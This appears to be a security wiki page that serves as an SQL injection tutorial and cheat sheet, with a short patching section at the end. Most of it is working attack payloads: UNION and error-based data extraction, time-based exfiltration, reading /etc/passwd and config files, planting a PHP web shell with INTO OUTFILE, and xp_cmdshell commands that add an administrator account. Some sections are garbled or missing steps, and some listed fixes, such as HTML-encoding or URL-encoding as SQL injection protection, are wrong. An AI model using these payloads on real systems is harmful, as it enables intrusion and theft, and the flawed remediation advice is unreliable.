Category:SQL injection
SQL injection is a method of exploiting web applications performed over http or https to compromise the underlying database engine supporting dynamic content for the web application itself. Successful exploitation of an SQL injection vulnerability can result in the attacker gaining unfettered access to the database and can lead to further privilege escalation.
Typically, databases include things like (but not limited to):
- Authentication credentials
- Other identifying information about a user (like an IP address)
- Site configurations
- Site content and themes
- Communications between users within the site
SQL injection requires a basic understanding of SQL and manipulation of SQL data |
Intermediate SQL injection
There are various methods for exploiting various databasing engines, including MySQL, PostgreSQL and Microsoft SQL server. Different engines may require different function names, environment variables, or syntax nuances for proper effectiveness.
Example testing is not included for UPDATE or INSERT queries using subqueries. In those cases, it is best to escape the argument, use a comma delimiter, and testing using integers until the right number of columns is found. Then substitute column values for insert and delete using subqueries that return a single cell rather than a single byte, similar to single-byte exfiltration
Automation theory
The most important thing when automating SQL injection is recognizing boundaries.
Loop Delimeters:
Obtaining data types:
Protip: It is a good idea to use order by every time injection occurs in case results are not constant due to where clause restraints.
Sometimes integer values won't be able to be selected when using error-based injection. There's more than one way to solve this.
Use ORDER by to find the upper most row and lower most row of the results set. It can be stopped by starting at an element on one end and then keeping the order by clause intact, incrementing the offset; it will stop when it has reached the value on the other end of the table. $stop_value = "select id from table order by id desc limit 1 offset 0"; $start_query = "select id from table order by id asc limit 1 offset 0"; In the loop: $loop_query = "select id from table order by id asc limit 1 offset $counter"; When the value returned by $loop_query equals the value from $stop_query, terminate the loop.
attempt to string concatenate a character to the integer to throw an error. |
Here are a few variables to be aware of while writing automated exploit software.
Temporary Variables:
SQL Dialect Variables:
Basic Injection : Union Select
- The UNION operator allows collection of the output of two SELECT statments with UNION ALL SELECT or UNION SELECT so long as the results have the
same number of columns:
Determining the number of columns
The number of columns can be determined using ORDER BY injection and incrementing a field index, for example:
/article.php?id=1 ORDER BY 1 asc /article.php?id=1 ORDER BY 2 asc
- When the page no longer displays, a boundary has been hit. The largest number in the order by clause that still allows the page to display properly is the number of columns.
Extracting data
If the number of columns is known in a table (for example, by using the ORDER BY injection technique), the following injection can be used assuming that there are 2 columns:
/article.php?id=5 UNION ALL SELECT 1,2/*
Notice: This selects every entry where both id=5 and where column = 1 or 2. If the number 1 or 2 was outputted, UNION would be demonstrated to work. If 2 was output, it is known that the application's programming displays the second column on the page. (This could be any column, really.)
/article.php?id=-1 UNION ALL SELECT 1,version()/* The version information should now be displayed in the area where the number `2' originally displayed.
/article.php?id=-1 UNION ALL SELECT 1,table_name from information_schema.tables where table_schema=database() limit 1/* In this case, the first table name in the current database should be displayed in stead of the version information.
/article.php?id=-1 UNION ALL SELECT 1,group_concat(table_name,0x2e,column_name) from information_schema.columns where table_schema=database()/*
The amount of data that can be returned returned by the group_concat() function is set by a session environment variable. |
Intermediate testing: "SELECT" ... LIMIT clause injections
A LIMIT clause may have two different inputs, one being the number of rows to return, the other being what row to start from when selecting the rows. On recent versions of MySQL the limit clause syntax is congruent to PostgreSQL syntax:
On older versions of MySQL, the offset operator was not supported. In those cases the older syntax will be used:
- Because the input is located at either $start or $perpage in a LIMIT clause, it can be deduced that:
UNION SELECT is the only available method for successful exploitation. The rest of the query will have to be commented out for successful exploitation.
- In order to access UNION SELECT if there are data limitations:
The LIMIT clause must be given an impossible starting offset so that no data will be displayed, making room for data returned by the UNION SELECT. The offset will have to be a larger number than the number of rows returned by the query.
Intermediate injection: information retrieval via verbose errors
This technique relies on the following database and application characteristics:
- Sometimes databases display errors containing selected data even though union select is not an option.
- Sometimes the application will display SQL errors on the page.
- An impossible cast
- A duplicate key in a group by statement
When a web application displays its SQL errors, there's a few things that can be done to make errors display data along with them. In each of the examples below, the @@database variable or current_database()/database() functions return what can be seen for error output. These can be replaced with any subquery'd select statement that returns a single cell.
AND 1=2 OR ROW(1,1) > (SELECT COUNT(*),concat(DATABASE(),0x3a,FLOOR(rand()*2) ) x FROM (SELECT 1 UNION SELECT 2) a GROUP BY x LIMIT 0,1)
AND 3=5 OR (SELECT CAST(current_database() AS NUMERIC)) = (SELECT CURRENT_USER()) |
Expert: Automated Single-byte exfiltration
There are multiple types of single byte exfiltration attacks:
- Timing based
- Pre-computation based
The only three things that all of these methods have in common is:
- These attacks are all limited in some fashion because of local environment and latency or remote environment and dataset.
- The target environment must not filter or otherwise restrict the use of commas (,); regular expressions will not work here because injected queries are selecting rather than comparing the value of a single byte.
- You must not be afraid of programming.
Timing-based single-byte exfiltration
If not on a LAN when this technique is utilized, buggy and unpredictable results will be attained. |
This testing is ideal when:
- It is taking place on a relatively low latency network
- There is access to a consistent latency and the remote page has a consistent load time (may not vary by more than 0.5 seconds)
Single byte exfiltration takes less queries to perform the same results, and leaves a smaller log footprint.
- A timer will need to be used to see how long it takes the remote server to serve the page.
Examples of timing-based single-byte exfiltration:
- Exfiltrating the first character of the database name in a single request:
AND sleep(ascii(SUBSTRING(@@DATABASE,1,1))) -- MySQL AND pg_sleep(ascii(SUBSTRING(current_database,1,1))) IS NULL -- PostgreSQL |
- By timing these (in seconds) the integer value of the ascii code of the first character of the database will be attained.
The comparative precomputation attack
This attack relies heavily on the remote dataset for successful exploitation and is thus less reliable than other methods. This significantly differs from previously discovered single-byte exfiltration techniques because:
/articles.php?id=255 Follow the next steps for automation (and sanity's) sake:
Almost done!
And the value of a byte has been determined. Protip: This attack can be extended by:
Further penetration
- Most demonstrated methods require additional privileges
Obtaining direct database access
There are several methods for obtaining direct database access so that log in can occur remotely.
- See the Privileged query cheat sheets for queries to directly obtain database credentials using SQL injection
- Obtaining authentication credentials from the web application configuration file by accessing the filesystem
SELECT load_file('/path/to/config.php'); |
- After escalating privileges to administrator of the web application using its administrative interface to run queries directly find the authentication credentials in the configuration file with a file editor
Obtaining authentication credentials from the web application's configuration file using code-execution after privilege escalation
Terminal |
localhost:~ $ find -name \*conf\*.php -exec grep -iHn "user\|name\|pass\|host" '{}' \; |
Obtaining filesystem access
This will require MySQL, depend on the SQL server configuration as well as the OS configuration, the user in context must have the FILE privilege.
Examples of these are located in the priveleged MySQL cheat sheet.
Obtaining code execution
- Through the vulnerable web application:
It is possible that the administrative interface will contain template and theme editors and the ability to add/modify/delete PHP or other interpreted languages in the associated files. Knowing this is just one more reason to make a beeline for the user table for the affected web application and get to cracking the authentication credentials for the admin user.
- Via database engine (MS SQL-specific)
By ending the query with a semicolon or comment delimiter and beginning a new query, we can get MS SQL to run
;exec master..xp_cmdshell 'net user hacker hacker_password /add' ;exec master..xp_cmdshell 'net localgroup administrators hacker /add' /url.asp?ArticleID=1;exec master..xp_cmdshell 'net user hacker hackerpassword /add';-- /url.asp?ArticleID=1;exec master..xp_cmdshell 'net localgroup administrators hacker /add';--
- Writing a shell to the document root (MySQL-specific)
Cheat Sheets
Vulnerability testing
Universal true and false statements
- Standard operators (Universal):
True: AND 230984752 = 230984752False: AND 1023947182234 = 4382616621386497 |
- The Between ... And ... operators (Universal):
True: AND 238829 BETWEEN 238826 AND 238927False: AND 328961 BETWEEN 928172 AND 986731 |
- The LIKE operator (Universal):
True: AND 'sqltest' LIKE 'sql%'False: AND 'sqltest' LIKE 'not true' |
- The REGEXP operator (RLIKE in Microsoft SQL and the "~" character in PostgreSQL, Universal):
True: AND 'sqltest' REGEXP '^sql'False: AND 'sqltest' REGEXP '^false' |
MySQL syntax reference
- Comment notation:
/* [*/] %23 (# urlencoded) --[space]
- Handy functions, statements, and Environment Variables:
version() USER() current_database() COUNT([column_name]) FROM [TABLE_NAME] LENGTH([column_name]) FROM [TABLE_NAME] [WHERE OR LIMIT] substr([query],[byte_counter],1) concat([column_name],0x2f,[column_name]) FROM [TABLE_NAME] [WHERE OR LIMIT] group_concat([column_name],0x2f,[column_name]) FROM [TABLE_NAME] [WHERE OR LIMIT] |
- The need for quotes can be evaded by using the 0x[hex] operator. An example is "select 0x6a6a". The output is "jj", same as if "select 'jj'" is run.
Mysql versions >= 5 user schema mapping (unprivileged)
- Show Databases Equivilent:
SELECT schema_name FROM information_schema.schemata LIMIT 1 offset 0 |
- Show Tables Equivilent
SELECT TABLE_NAME FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 offset 0 |
- Show Fields Equivilent
SELECT column_name FROM information_schema.columns WHERE table_schema=DATABASE() AND TABLE_NAME=([TABLE query]) LIMIT 1 offset 0 |
Privileged MySQL (any version) user
- Get mysql usernames and password hashes:
SELECT concat(USER,0x2f,password) FROM mysql.user LIMIT 1 |
- Grab /etc/passwd
SELECT load_file(0x2f6574632f706173737764) |
- Dump a small php shell (<?php system($_GET['id']); ?>) into /var/www/localhost/htdocs
SELECT 0x3c3f7068702073797374656d28245f4745545b276964275d293b203f3e INTO OUTFILE '/var/www/localhost/htdocs/.shell.php' |
PostgreSQL syntax reference
Handy functions & Environment Variables include:
current_database() CURRENT_USER() chr() ascii() substr() |
Quick and common string concatenations:
String concatenation in postgresql is done using the two pipe operators side by side, e.g. "select chr(97)||chr(97)" is the same as "select 'aa'". |
PostgreSQL schema mapping
SELECT schema_name FROM information_schema.schemata WHERE catalog_name=current_database() LIMIT 1 offset 0
SELECT TABLE_NAME FROM information_schema.tables table_type='BASE TABLE' AND table_schema=([schema_query]) AND catalog_name=current_database() LIMIT 1 offset 0
SELECT column_name FROM information_schema.columns WHERE TABLE_NAME=([table_query]) AND table_schema=(schema_query) AND catalog_name=current_database() LIMIT 1 offset 0 |
Microsoft SQL syntax reference
- Handy functions, statements, and Environment Variables:
database() ascii() substring() WAIT ... FOR DELAY @@version
String concatenation is preformed in Microsoft SQL via the + character. |
Microsoft SQL schema mapping (unprivileged)
SELECT top 1 column_name FROM (SELECT top 1 column_name FROM information_schema.columns WHERE table_catalog=@@DATABASE AND TABLE_NAME='[table_name]' GROUP BY column_name ORDER BY column_name ASC) sq GROUP BY column_name ORDER BY column_name DESC |
Privileged microsoft SQL injection
- Command Execution:
;%0a%0dexec master..xp_cmdshell 'net user hacker hackerpassword /add';-- ;%0a%0dexec master..xp_cmdshell 'net localgroup administrators hacker /add';--
- Obtaining database authentication credentials:
SELECT * FROM sysobjects WHERE type='U'
Patching SQL Injection Vulnerabilities
The security analyst says |
- Ruby input sanitizing:
[Sanitizes For] | [Type] | [Engine] | [Example] XSS, SQL Injection | String | Any | var = HTMLEntities.encode(var,:basic:) SQL Injection | String | MySQL | var = Mysql.escape_string(var) SQL Injection | String | PostgreSQL | var = PGconn.escape_string(var) XSS, SQL Injection | Integer | Any | var = var.to_i
- PHP input sanitizing:
[Sanitizes For] | [Type] | [Engine] | [Example] XSS, SQL Injection | String | Any | $var = htmlentities($_GET['var'],ENT_QUOTES); SQL Injection | String | MySQL | $var = mysql_real_escape_string($_GET['var']); SQL Injection | String | PostgreSQL | $var = pg_escape_string($_GET['var']); XSS, SQL Injection | Integer | Any | $var = (int)$_GET['var'];
- Python input sanitizing:
Python2.4 and newer defaults to using prepared statements. Thus, this table only refers to legacy applications built in python versions < 2.4 that require manual sanitizing. |
XSS, SQL Injection | String | Any | var = urllib.urlencode(var) SQL Injection | String | MySQL | var = conn.escape_string(var) SQL Injection | String | PostgreSQL | var = psycopg2.extensions.adapt(var) XSS, SQL Injection | Integer | Any | var = int(var)
Further reading
Related Content:
- SQL Backdoors
- Programming language specifications: Perl,Python,C,C++
Related Tools:
- Vanguard
- MySql 5 Enumeration
- GScrape - Now updated for SQL injection.
External Links:
This category currently contains no pages or media.